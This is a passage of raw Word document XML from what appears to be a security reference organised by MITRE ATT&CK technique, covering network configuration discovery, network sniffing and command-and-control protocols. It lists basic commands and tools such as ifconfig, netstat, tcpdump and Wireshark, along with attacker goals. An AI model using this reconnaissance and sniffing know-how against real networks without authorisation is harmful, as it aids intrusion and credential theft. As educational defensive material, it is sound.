    <w:p w14:paraId="26DC7FC4" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741E4A5B" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Identify security software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49178230" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Locate valuable applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296A6FB5" w14:textId="237B7DC0" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Discover privileged services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A00CAB" w14:textId="77777777" w:rsidR="00B42FCF" w:rsidRPr="003168F2" w:rsidRDefault="00B42FCF" w:rsidP="00B42FCF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="734C2960" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System Network Configuration Discovery — T1016</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDC31AC" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Attackers collect network-related information to understand the environment and prepare for lateral movement or further attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596A7F9B" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Information Collected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AE3B44" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6824975D" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Routing tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECFA7B2" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNS servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F613A7E" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Network interface configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300DE404" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Linux Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF14B0A" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D89375" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ip addr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9D944B" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>netstat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614EE234" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A48C061" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Map the network environment for future operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44091AC3" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="00000000" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="173E84B0">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C54764B" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4AF1B7" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Network Sniffing — T1040</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3927C47C" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Network sniffing involves capturing and analyzing network traffic flowing through a system or network device. Attackers use this technique to intercept sensitive information transmitted across the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A99C11" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Captured Data May Include</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D51BE8" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089C640F" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Session cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B73F94" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sensitive files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0F1071" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Internal communications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF6ACAD" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Common Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114B1270" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tcpdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080EFEE6" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42557779" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Custom packet sniffers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D54674" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Risk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FCC6C1" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unencrypted traffic can be exposed and intercepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0761A233" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="00000000" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="54750D68">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="479827F6" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Command and Control (C2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3341F35E" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Command and Control techniques allow compromised systems to communicate with attacker-controlled infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04221F50" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Non-Application Layer Protocol — T1095</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C180273" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Attackers use low-level network protocols instead of standard web traffic to communicate with compromised systems. This can make malicious traffic more difficult to inspect or detect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3022CD12" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
